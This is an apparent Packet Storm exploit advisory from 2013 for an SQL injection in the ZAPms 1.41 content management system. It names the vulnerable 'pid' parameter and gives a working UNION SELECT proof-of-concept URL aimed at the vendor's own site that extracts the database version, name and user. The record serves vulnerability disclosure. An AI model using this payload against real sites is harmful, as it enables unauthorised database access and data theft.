ZAPms 1.41 SQL Injection

2013-04-10T00:00:00
ID PACKETSTORM:121202
Type packetstorm
Reporter NoGe
Modified 2013-04-10T00:00:00

Description

                                        
                                            `=============================================================================================================  
  
  
[o] ZAPms <= SQL Injection Vulnerability  
  
Software : ZAPms  
Version : 1.41  
Vendor : http://www.zapms.de  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Desc : ZAPms is free open source web content management system,  
adapted to the needs of businesses on the Internet.  
The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.  
  
  
=============================================================================================================  
  
  
[o] Exploit  
  
http://localhost/[path]/products?pid=[SQLi]  
  
  
=============================================================================================================  
  
  
[o] PoC  
  
http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product  
  
  
=============================================================================================================  
  
  
[o] Greetz  
  
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory  
aJe kaka11 matthews wishnusakti inc0mp13te martfella  
pizzyroot Genex H312Y noname tukulesto }^-^{  
  
  
=============================================================================================================  
  
  
[o] April 09 2013 - Papua, Indonesia  
`